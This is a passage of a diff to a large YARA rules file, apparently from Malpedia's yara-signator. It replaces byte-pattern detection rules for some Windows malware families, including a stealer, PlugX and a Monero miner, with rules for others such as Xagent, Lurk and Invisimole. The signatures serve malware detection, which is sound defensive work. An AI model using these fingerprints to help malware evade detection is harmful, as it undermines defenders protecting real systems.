+		$sequence_13 = { c745f41e000000 c745f80f000000 8955fc 8bcb }
+		$sequence_14 = { e8???????? 56 53 8d4d80 e8???????? }
+		$sequence_15 = { ff15???????? 89460c 3bc3 7507 }
+		$sequence_16 = { f3a5 8d88e00e0000 894de4 8bcb }
+		$sequence_17 = { e8???????? 59 83f8ff 7503 32c0 c3 }
+		$sequence_18 = { 83781410 7202 8b00 50 8b45a0 }
+		$sequence_19 = { c1e004 8bf0 0fbe4301 50 }
+		$sequence_20 = { c9 c3 8b542408 85d2 7503 33c0 c3 }
+		$sequence_21 = { 53 68???????? 6802000080 ff15???????? 85c0 751b }
+		$sequence_22 = { 50 ff15???????? 8b4da0 8901 85c0 }
+		$sequence_23 = { 50 6a09 53 68???????? }
+		$sequence_24 = { 0fb605???????? 50 0fb605???????? 50 0fb605???????? 50 6a01 }
+		$sequence_25 = { 68???????? e8???????? 59 83f820 }
+		$sequence_26 = { 395df0 7411 ff75f0 53 }
+		$sequence_27 = { 53 50 899e6caf0600 e8???????? }
+		$sequence_28 = { 53 68???????? 8d8da8000000 e8???????? }
+		$sequence_29 = { 895df0 8d45f0 50 6a09 }
+		$sequence_30 = { 399e70af0600 7514 c78678af060001000000 c78670af060000000100 68fcff0100 8d8670af0400 53 }
+		$sequence_31 = { 7411 395df0 740c ff75f0 ff15???????? 895df0 }
+		$sequence_32 = { 741d ff75f0 ff15???????? 895df0 395df0 740c ff75f0 }
+		$sequence_33 = { c3 55 8bec 83ec0c 8365fc00 8365f400 8365f800 }
+		$sequence_34 = { 8d852cffffff 50 8d459c 50 }
+		$sequence_35 = { 0faf450c 50 e8???????? 59 }
+		$sequence_36 = { 8b4508 8906 8b450c 894608 8b4510 }
+		$sequence_37 = { e8???????? c9 c3 55 8bec 83ec18 8b450c }
+		$sequence_38 = { 8910 8b4120 8910 8b4130 8910 c3 56 }
+		$sequence_39 = { 50 ff15???????? 6a1a e8???????? }
+		$sequence_40 = { 6860ea0000 6a00 ff15???????? 50 }
+		$sequence_41 = { 5f c21000 8bff 55 8bec 6a0a }
+		$sequence_42 = { 5b 5d c3 b84d5a0000 }
+		$sequence_43 = { 83f8ff 740c a810 7508 }
+		$sequence_44 = { eb0b 8b45f4 0500040000 8945f4 }
+		$sequence_45 = { dd1c24 6a0b 6a10 e8???????? 83c41c 8be5 }
+		$sequence_46 = { 4c8bc7 33d2 488bc8 ff15???????? e8???????? }
+		$sequence_47 = { dd45f0 dd1c24 83ec08 dd4508 dd1c24 6a0b 6a10 }
+		$sequence_48 = { 492bc1 483d40420f00 0f87f0000000 458bc7 }
+		$sequence_49 = { 2bd3 03ca 4103cb 0f84de010000 4863442440 33d2 440fb6743001 }
+		$sequence_50 = { 83bc24a400000000 b8ea22c8aa b9a5a0bab6 0f44c1 }
+		$sequence_51 = { f30fe6c9 f20f58c0 f20f5cc8 f20f59ce f20f114c2458 0fbe05???????? 0fbe0d???????? }
+		$sequence_52 = { 83bc249400000000 b9ed1334e4 b8302e84ed 0f4fc8 e9???????? 8b8c248c000000 }
+		$sequence_53 = { 8bd7 8bc5 83ee04 7211 8b0a }
+		$sequence_54 = { 83bc249c00000000 bf9def53cd b8a3d8a22f 0f4ff8 }
+		$sequence_55 = { 83bc24a004000000 b9e2dadbde 0f8408ffffff b95fc85b65 }
+		$sequence_56 = { 492bc3 493bc2 7708 41ffc0 }
+		$sequence_57 = { 2bc1 f2480f2ac0 f20f59442458 f20f2cc0 894590 4863442440 }
+		$sequence_58 = { 492bc2 483bc1 770c 41ffc1 }
+		$sequence_59 = { 83bc24a007000000 b8c00c462f b92fb31014 0f44c8 }
+		$sequence_60 = { 8bd8 33da 80f101 898c2484000000 }
+		$sequence_61 = { 8bd8 23d1 8b149518d54600 c1eb08 }
+		$sequence_62 = { 0f57c0 f2480f2ac2 33d2 f20f59c8 f20f114c2450 0fbe05???????? }
+		$sequence_63 = { 492bd1 4e8d0436 6666660f1f840000000000 410fb60408 }
+		$sequence_64 = { 0fbe0d???????? 3bc1 7429 0fbe0d???????? 0fafcf 8d0449 }
+		$sequence_65 = { 0fbec8 0f57d2 0fbe05???????? 8d14d1 0fbe0d???????? 03c2 }
+		$sequence_66 = { 4923c2 493bc3 7742 488bc2 4923c2 493bc3 }
+		$sequence_67 = { 83bc249400000003 0f9c442460 8b05???????? 8d4801 }
+		$sequence_68 = { 0f8c0d230000 488b7c2440 8b742450 488d0d1c700200 e8???????? 488d8d10030000 ff15???????? }
+		$sequence_69 = { 83bc24980000000e 0f9c442464 8b05???????? 8d4801 }
+		$sequence_70 = { 83bc24980000000f b9fe4381ca b800af166b 0f4cc8 }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 4751360
 }
-rule MALPEDIA_Win_Wannahusky_Auto : FILE
+rule MALPEDIA_Win_Atmitch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36a1577e-36ff-5776-bdb4-d895a2d2a50b"
+		id = "40b30c3c-57b4-5224-a4e5-a107d24cada9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wannahusky_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atmitch_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "5ceb031e7aa4de1c7907749dee4ed5beefedb2e46a515067de310b2cbc83c4b9"
+		logic_hash = "71ef7f74c9366c16202f9b9ae280ad39b24b004194d9f9aea8b4282ba76a3264"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137533,32 +137192,32 @@ rule MALPEDIA_Win_Wannahusky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c605????????02 c705????????60b04100 c705????????18000000 c705????????04000000 }
-		$sequence_1 = { 7408 8bbdf0faffff 8b0f 89442404 }
-		$sequence_2 = { ba28020000 8d8d98fbffff e8???????? 8d8500fbffff c744240810000000 }
-		$sequence_3 = { 83c008 c744240401000000 890424 ff15???????? 89ca }
-		$sequence_4 = { c705????????04000000 c705????????a0464200 c705????????e01c4100 c705????????f0b34100 c705????????00000000 }
-		$sequence_5 = { c705????????04000000 66c705????????2b03 c705????????18000000 c705????????04000000 c605????????11 c705????????80bb4100 }
-		$sequence_6 = { c785fcfaffff00000000 8b480c e8???????? ba01000000 8d8dfcfaffff 8985fcfaffff e8???????? }
-		$sequence_7 = { e8???????? 8b45cc 3b45c0 7218 8b7dc0 890424 }
-		$sequence_8 = { 56 53 83ec6c 8955c0 807d0800 ba???????? }
-		$sequence_9 = { c705????????08b44100 c705????????00000000 c705????????04000000 c705????????04000000 66c705????????1903 c605????????01 }
+		$sequence_0 = { 7407 8b542418 895004 837c242400 740c 8b442420 50 }
+		$sequence_1 = { ff15???????? 8d4c2414 ff15???????? 8d4c2410 ff15???????? }
+		$sequence_2 = { ff15???????? c744242000000000 833d????????02 7f05 e8???????? a1???????? }
+		$sequence_3 = { 8b4818 83c408 51 51 8bcc 8964241c }
+		$sequence_4 = { 50 680300020b ff15???????? 8d4c240e 51 51 8bcc }
+		$sequence_5 = { c645fc01 8b06 8b4804 8b443110 25c0010000 }
+		$sequence_6 = { 6aff 8d4c2414 ff15???????? 6a00 6a0a 8d4c2418 ff15???????? }
+		$sequence_7 = { 8bf8 83c404 33c9 33d2 33c0 6a11 }
+		$sequence_8 = { 8bcc 89642410 68???????? ff15???????? e8???????? 83c404 a1???????? }
+		$sequence_9 = { 8b0e 0fb7412c 83c408 83f809 774d ff2485f4200010 b8???????? }
 
 	condition:
-		7 of them and filesize < 862208
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Kiwistealer_Auto : FILE
+rule MALPEDIA_Win_Lurk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7bc76ddb-b6a4-53dd-88a7-f41bc1cc2494"
+		id = "42f43514-1d0a-5f85-8b4c-4d2eb84cb8ec"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kiwistealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kiwistealer_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lurk_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "27341d3fac694e410d992d38e84f32a2cf2b6688bb4c9bbb3f17b7cb4866a5bf"
+		logic_hash = "d1c263745e96efcdbb8910da6861ed00bbaa0d8e2de63a2bd4a743972e1ce722"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137572,34 +137231,40 @@ rule MALPEDIA_Win_Kiwistealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4585c9 7462 4183e901 740f 4183f901 0f85d6000000 }
-		$sequence_1 = { 4885c0 740e 488d7027 4883e6e0 488946f8 eb14 ff15???????? }
-		$sequence_2 = { 488b05???????? 4885c9 480f45c1 483b05???????? 747e 4c8bc6 488d542470 }
-		$sequence_3 = { 0f118424b0020000 0f104810 0f118c24c0020000 4c896010 48c740180f000000 c60000 4c8d8c2458030000 }
-		$sequence_4 = { e9???????? 4983c5c0 4c896c2428 493bdc 0f85bc000000 4983ee40 4c89742420 }
-		$sequence_5 = { e8???????? 43c6042e00 4533f6 488d45d8 48837df010 480f4345d8 4c89742438 }
-		$sequence_6 = { 488b05???????? 488905???????? 488d0d3d110200 e8???????? 8bc8 486bc10b 83f803 }
-		$sequence_7 = { 0f118590000000 418d4c2440 e8???????? 488bd8 4889442428 33d2 488bc8 }
-		$sequence_8 = { 41c70005000000 49894008 498bc0 41c6400401 c3 8bca 81e9d4040000 }
-		$sequence_9 = { 4883ec70 488bf9 4533f6 44897098 488d2db0920000 488968a0 0f57c0 }
+		$sequence_0 = { ff7508 ff15???????? 8b35???????? 50 ff7508 }
+		$sequence_1 = { 8b4508 5b 5f 5e c9 c3 55 }
+		$sequence_2 = { 8908 8b4514 85c0 7407 8b4e28 03cf }
+		$sequence_3 = { 0f84e0000000 8b45fc 8b4dd8 03480c 51 ff55f4 }
+		$sequence_4 = { 8955f4 837df404 7325 8b4df0 }
+		$sequence_5 = { 80780500 8d45fc 7404 6a00 eb02 6a01 50 }
+		$sequence_6 = { 5f 5e c9 c20400 a1???????? 32c9 384802 }
+		$sequence_7 = { eb29 837d0803 7504 6a03 eb08 837d0804 7519 }
+		$sequence_8 = { c9 c3 6afe eb02 6afd }
+		$sequence_9 = { 8945cc 8b45fc 83c008 8945f0 }
+		$sequence_10 = { 8945fc e8???????? c745f801000000 2975f8 }
+		$sequence_11 = { a1???????? 385805 744f 53 53 }
+		$sequence_12 = { 8945d0 8b45f8 895dd4 8945d8 8b3d???????? }
+		$sequence_13 = { 8955f0 8b45f4 8b4814 c1e11f c1f91f 7412 }
+		$sequence_14 = { 8955f0 e9???????? 8b55fc 8b45ec }
+		$sequence_15 = { 8945d4 837dd400 7513 8b45d8 }
 
 	condition:
-		7 of them and filesize < 403456
+		7 of them and filesize < 5316608
 }
-rule MALPEDIA_Win_Plugx_Auto : FILE
+rule MALPEDIA_Win_Pvzout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "087f4536-9e07-5d7f-a0d5-0a134931bcd8"
+		id = "3a2ef17b-53cd-553c-9129-4e623095fe72"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plugx_auto.yar#L1-L286"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pvzout_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "341c1f01e0832398e975d439fb075776745e2dea735d9688a1d350eef060bf14"
+		logic_hash = "a07bc946194cd01a9387c49797743aad8628a2824c8c9c6f1536148459ed0ba4"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -137611,57 +137276,34 @@ rule MALPEDIA_Win_Plugx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 51 0fb74612 }
-		$sequence_1 = { 55 8bec 8b450c 81780402700000 }
-		$sequence_2 = { 53 6a00 6a00 6a02 ffd0 85c0 }
-		$sequence_3 = { 51 56 57 6a1c 8bf8 e8???????? 8bf0 }
-		$sequence_4 = { 56 8b750c 8b4604 050070ffff }
-		$sequence_5 = { 41 3bca 7ce0 3bca }
-		$sequence_6 = { 0145f4 8b45fc 0fafc3 33d2 }
-		$sequence_7 = { e8???????? 85c0 7508 e8???????? 8945fc }
-		$sequence_8 = { e8???????? 3de5030000 7407 e8???????? }
-		$sequence_9 = { 85c0 7413 e8???????? 3de5030000 }
-		$sequence_10 = { e8???????? 85c0 7407 b84f050000 }
-		$sequence_11 = { 50 ff15???????? a3???????? 8b4d18 }
-		$sequence_12 = { e8???????? 85c0 750a e8???????? 8945fc }
-		$sequence_13 = { 85c0 750d e8???????? 8945f4 }
-		$sequence_14 = { 6a00 6a00 6a04 6a00 6a01 6800000040 57 }
-		$sequence_15 = { 57 e8???????? eb0c e8???????? }
-		$sequence_16 = { 51 6a00 6800100000 6800100000 68ff000000 6a00 6803000040 }
-		$sequence_17 = { 6819000200 6a00 6a00 6a00 51 }
-		$sequence_18 = { 50 ff75e8 6802000080 e8???????? }
-		$sequence_19 = { ffd7 a3???????? 56 ffd0 }
-		$sequence_20 = { 6a01 6a00 e8???????? a3???????? 6800080000 68???????? }
-		$sequence_21 = { 51 6a02 e8???????? 6800f00000 }
-		$sequence_22 = { 89442424 8b442424 6808020000 6a00 }
-		$sequence_23 = { 6800080000 68???????? e8???????? 6800080000 68???????? e8???????? }
-		$sequence_24 = { 6808020000 6a00 ff74242c e8???????? }
-		$sequence_25 = { 5d c21000 55 53 57 56 83ec18 }
-		$sequence_26 = { 89742434 89f1 8b442434 e8???????? }
-		$sequence_27 = { 50 56 ffb42480000000 ff15???????? }
-		$sequence_28 = { 50 6802000080 53 e8???????? }
-		$sequence_29 = { 6a5c ff74241c e8???????? 83c408 }
-		$sequence_30 = { 56 ff742478 ffd0 89442420 }
-		$sequence_31 = { 6a00 ff74245c e8???????? 83c40c }
-		$sequence_32 = { 40 eb95 89f1 c644242a00 }
+		$sequence_0 = { d4a1 0e 75a8 43 }
+		$sequence_1 = { bf95f6810e 75a8 43 1dea50873a d4a1 0e }
+		$sequence_2 = { 43 1dea50873a d4a1 0e 75a8 43 1dea50873a }
+		$sequence_3 = { 1dea50873a d4a1 0e 75a8 43 1dea50873a }
+		$sequence_4 = { 3089f33d80f3 48 e21c 3e3f 19e9 }
+		$sequence_5 = { 18830d88a01c 51 ab 25b53ae778 f3bd95ab4ed8 }
+		$sequence_6 = { 1dea50873a d4a1 0e 75a8 }
+		$sequence_7 = { 19e9 73f8 dca10ebd24e8 252b0026cb 9e }
+		$sequence_8 = { d4a1 0e 75a8 43 2f 3089f33d80f3 }
+		$sequence_9 = { 5a bf95f6810e 75a8 43 }
 
 	condition:
-		7 of them and filesize < 1284096
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Kutaki_Auto : FILE
+rule MALPEDIA_Win_Xagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0ce7f5d-750c-52b1-ad8e-d94947241870"
+		id = "858895d8-2a97-5541-a089-3de82693028e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kutaki_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xagent_auto.yar#L1-L243"
 		license_url = "N/A"
-		logic_hash = "2d6337f5a069ed263b69e96c0f4411506a5a576a0de1c3fe88d0c7f6f51b0ebe"
+		logic_hash = "6bd2f7e71d8c01d128cc02e9a985eec56e3c9b4bd52be45a95e998c8268d5099"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -137673,32 +137315,48 @@ rule MALPEDIA_Win_Kutaki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8945d4 8d55d4 52 8d45cc 50 ff15???????? }
-		$sequence_1 = { ff15???????? 85c0 0f849b020000 8d4ddc 51 ff15???????? 50 }
-		$sequence_2 = { 51 e8???????? c745fc04000000 8b5510 33db 833a00 0f9ec3 }
-		$sequence_3 = { 8b4db4 3b4810 7309 c7458800000000 eb09 ff15???????? }
-		$sequence_4 = { 8d953cffffff 52 6808200000 ff15???????? 898564feffff 8d8564feffff 50 }
-		$sequence_5 = { ffd7 a1???????? 6685f6 0f8dfd000000 85c0 7515 68???????? }
-		$sequence_6 = { 50 ff15???????? 898548ffffff eb0a c78548ffffff00000000 833d????????00 751c }
-		$sequence_7 = { 68???????? c78570ffffff01000000 c78568ffffff02000000 ffd6 68???????? 66898560ffffff c78558ffffff02000000 }
-		$sequence_8 = { 8985a4feffff 83bda4feffff00 7d26 68a0000000 }
-		$sequence_9 = { 8b957cffffff 52 ff15???????? 898518ffffff eb0a c78518ffffff00000000 8b45c8 }
+		$sequence_0 = { c1ea02 6bd20d b801000000 2bc2 }
+		$sequence_1 = { ff15???????? 8bd8 e8???????? 03d8 }
+		$sequence_2 = { 7702 2bc7 8b5204 8b0482 8b0488 8b4e10 85c9 }
+		$sequence_3 = { 33d2 eb02 8b11 8b4808 8bc1 57 8b7a08 }
+		$sequence_4 = { 8b7a08 c1e802 83e103 3bf8 7702 2bc7 8b5204 }
+		$sequence_5 = { 55 8bec 33c0 83ec0c 39412c }
+		$sequence_6 = { 7507 c7460c00000000 5f 5e 8be5 }
+		$sequence_7 = { e8???????? 8b4604 85c0 7407 8b4d08 8b11 8910 }
+		$sequence_8 = { ff15???????? 6a08 e8???????? 83c404 85c0 }
+		$sequence_9 = { 03ff 3b7e0c 7707 c7460c00000000 49 894e10 7507 }
+		$sequence_10 = { 7509 488b03 488bcb ff5008 488b7d8f 4883c610 488d46f8 }
+		$sequence_11 = { e8???????? 48833b00 740a 488b4308 }
+		$sequence_12 = { 4883ec30 4883792800 498bf9 498bf0 }
+		$sequence_13 = { 740c 488b07 4c8b13 488903 4c8917 488b13 488b0e }
+		$sequence_14 = { e8???????? 488b4328 4c8bcf 4c8bc6 }
+		$sequence_15 = { 0f92c3 488d4c2430 e8???????? 90 }
+		$sequence_16 = { e8???????? 90 0fb705???????? 6689442420 }
+		$sequence_17 = { 740c 488b07 488b0b 488903 48890f 488b5c2430 488b6c2438 }
+		$sequence_18 = { b803b57ea5 f7e6 c1ea06 6bd263 }
+		$sequence_19 = { 75f8 488d8c2430010000 482bc1 488d8c0430010000 }
+		$sequence_20 = { 75f8 488bf9 482bfe 2bfb }
+		$sequence_21 = { 75f8 488bf9 482bfb 448bcf }
+		$sequence_22 = { 75f8 488d4c2420 482bc1 488d4c0420 }
+		$sequence_23 = { 75f8 488bf9 482bfa 4c8bc7 }
+		$sequence_24 = { 75f8 488bf8 482bfa 488b4b28 }
+		$sequence_25 = { 75f8 492bc3 488bcf 6645892c03 }
 
 	condition:
-		7 of them and filesize < 1335296
+		7 of them and filesize < 729088
 }
-rule MALPEDIA_Win_Monero_Miner_Auto : FILE
+rule MALPEDIA_Win_Sword_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53964e17-4946-5df0-a485-9eaee6f615c2"
+		id = "8539535f-357d-5d16-925a-82cf11392564"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.monero_miner_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sword_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "cffe54ca1957e07a44d930d7017ae2111987cffb75cbed1acab293924f2ab98e"
+		logic_hash = "f965a414f19aed1fee3b06d38e5b293cff63935b0d3b803549aab6fbb9244e65"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137712,32 +137370,32 @@ rule MALPEDIA_Win_Monero_Miner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6043000 c744240811000000 89442404 c70424???????? e8???????? 85c0 7411 }
-		$sequence_1 = { e8???????? 0fb643fa 8d4e04 c7442404???????? 890c24 89442408 e8???????? }
-		$sequence_2 = { 8b6c240c 136c2424 8b8c24d4000000 8bbc24dc000000 89c2 8b4350 31f2 }
-		$sequence_3 = { e8???????? 8d9424a0000000 8d442460 b901000000 e8???????? 8d542460 8d8424a0000000 }
-		$sequence_4 = { 890424 e8???????? 83f8ff 0f8463050000 817c2434ff3f0000 8b442430 0f96c2 }
-		$sequence_5 = { 8b94247c010000 898c2448020000 899c244c020000 8b9c248c010000 89c5 0fa4d017 0fa4ea17 }
-		$sequence_6 = { 8db4248c000000 c60000 89442414 8b8398000000 8974240c c7442404???????? 89442410 }
-		$sequence_7 = { 8b542428 8354242c00 83c340 836c242040 c1e206 39542414 0f87c3feffff }
-		$sequence_8 = { ffd6 83f8ff 75de 81c4cc0f0000 89e8 5b 5e }
-		$sequence_9 = { 8906 8b7413fc 897411fc 8b7d14 89de 81c784000000 }
+		$sequence_0 = { 897c242c 8b3d???????? 6800010000 c74424143c000000 c744242064924000 89542424 }
+		$sequence_1 = { f2ae f7d1 49 8d842488020000 51 50 56 }
+		$sequence_2 = { 8bfd 83c9ff 33c0 f2ae 8b542424 33db f7d1 }
+		$sequence_3 = { e8???????? 83c404 50 ff15???????? 668944240a 8d842428040000 50 }
+		$sequence_4 = { 7c85 5f 5e 5d b801000000 5b 83c40c }
+		$sequence_5 = { 8d8c2498060000 51 52 e8???????? 83c40c 8d842474020000 }
+		$sequence_6 = { 8d942488030000 f2ae f7d1 2bf9 53 8bf7 8bfa }
+		$sequence_7 = { 52 e8???????? 8818 8d842490020000 }
+		$sequence_8 = { 6a00 6a00 6a00 7509 8d542414 }
+		$sequence_9 = { 8d3c8d00a14000 c1e603 8b0f f644310401 7456 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 1425408
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Mrac_Auto : FILE
+rule MALPEDIA_Win_Spygrace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e787bb3-4d81-533a-b44d-f20be9e2f442"
+		id = "3c99942d-74fe-50f1-a9c2-d735c42e0b85"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrac"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mrac_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spygrace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spygrace_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "5fe94aec6f3ba68621e3ca20e2c4449488e4dd8245ed859f8a76ad9159490f6c"
+		logic_hash = "4d1aafea2b2d6148a5221a777c3a4ed202ce4fd229ea04549615dae7ae9b5684"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137751,32 +137409,32 @@ rule MALPEDIA_Win_Mrac_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bc8 e8???????? c78424780600001e000000 c684247c0600006a c684247d0600007f c684247e0600006d }
-		$sequence_1 = { 8bde 83e03f c1fb06 6bc830 8b049d804b4500 894dfc 837c0118ff }
-		$sequence_2 = { e8???????? 0420 8d8c2434040000 6a35 8884244f040000 e8???????? }
-		$sequence_3 = { 040f 3476 888424ef040000 8b8424dc040000 0410 3463 888424f0040000 }
-		$sequence_4 = { 8b4df0 8b048d804b4500 f644382848 741c 8a55ff 80fa0a 7504 }
-		$sequence_5 = { e8???????? c68424c813000076 c68424c91300006d c68424ca1300007c 8d8c24c8130000 c68424cb13000028 c68424cc1300007b }
-		$sequence_6 = { 8a840d6cffffff 2c0a 88840d6cffffff 41 83f909 72ea 68eeeac01f }
-		$sequence_7 = { 8bf0 c645e57d c645e675 c645e74a c645e86d c645e973 c645ea7e }
-		$sequence_8 = { 8d8c2458090000 88842466090000 e8???????? 3453 8d8c2454090000 6a0c 88842467090000 }
-		$sequence_9 = { c68424ce0e000049 c68424cf0e000056 c68424d00e000006 c68424d10e00006b c68424d20e000075 c68424d30e000075 c68424d40e000077 }
+		$sequence_0 = { 85c0 742a 488bc5 4c8d05d90c0300 488bcd 48c1f906 83e03f }
+		$sequence_1 = { 488bc3 48397b18 7203 488b03 48894c2430 4889442428 48c744242013000000 }
+		$sequence_2 = { bb01000000 4533e4 448d4b5b 6644394c48fe 7440 483bca 731c }
+		$sequence_3 = { 488d4db0 48837dc808 480f434db0 ffd2 85c0 0f85b0010000 4d8d86a0020000 }
+		$sequence_4 = { 490f42c0 488d4dd0 48837de808 480f434dd0 4c2bc0 4c8945e0 4e8d044502000000 }
+		$sequence_5 = { 488d4d1f e8???????? 90 488b4b10 48b8ffffffffffffff7f 482bc1 4883f807 }
+		$sequence_6 = { 4c8b4110 488bf1 4d85c0 b901000000 490f45c8 488be9 }
+		$sequence_7 = { e8???????? e9???????? 49638dd0330000 e8???????? 4889442448 498bce be10000000 }
+		$sequence_8 = { 488d05bbc60200 4889442460 488d05c7c60200 4889442468 488d05cbc60200 4889442470 488d05cfc60200 }
+		$sequence_9 = { 498bc8 e8???????? 4883a31004000000 488bcb 48c783180400000f000000 c6830004000000 4883c420 }
 
 	condition:
-		7 of them and filesize < 745472
+		7 of them and filesize < 865280
 }
-rule MALPEDIA_Win_Troldesh_Auto : FILE
+rule MALPEDIA_Win_Invisimole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71dc6e06-8dd4-5865-ab10-09f20ee5e07a"
+		id = "ff26101a-652d-5609-8231-3c338869a11e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.troldesh_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.invisimole_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "54ddaca68ab9115d35e14f6b78269f4735d8b277965f7a8b9f90608c52763a8d"
+		logic_hash = "8969781531efc17812b2df34968a188468c9267be73167ccabb12759d11db9c9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137790,71 +137448,71 @@ rule MALPEDIA_Win_Troldesh_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd5 85c0 755e 6a08 8d442478 50 8d44244c }
-		$sequence_1 = { e8???????? 56 57 8bf3 b8ff0f0000 c1ee0c 8bfb }
-		$sequence_2 = { ff75fc 50 e8???????? 83c40c 85c0 741a 8b4610 }
-		$sequence_3 = { e8???????? 8b3e 53 e8???????? c7839400000001000000 8b36 8b462c }
-		$sequence_4 = { e8???????? e9???????? 83f807 0f85d4000000 8bf5 e8???????? 8bf0 }
-		$sequence_5 = { e8???????? 8b4f04 51 89442418 895c241c e8???????? 83c404 }
-		$sequence_6 = { e8???????? ff750c ff7508 e8???????? 83c418 eb6d e8???????? }
-		$sequence_7 = { e8???????? 8b8c249c000000 83c40c 50 57 68???????? 53 }
-		$sequence_8 = { ff75f8 8b7070 e8???????? 8945f8 59 85c0 0f8562ffffff }
-		$sequence_9 = { e9???????? 3975f4 740b 53 e8???????? 59 85c0 }
+		$sequence_0 = { c745f4ffffffff e8???????? 83c414 e9???????? 6a00 6800000008 6a03 }
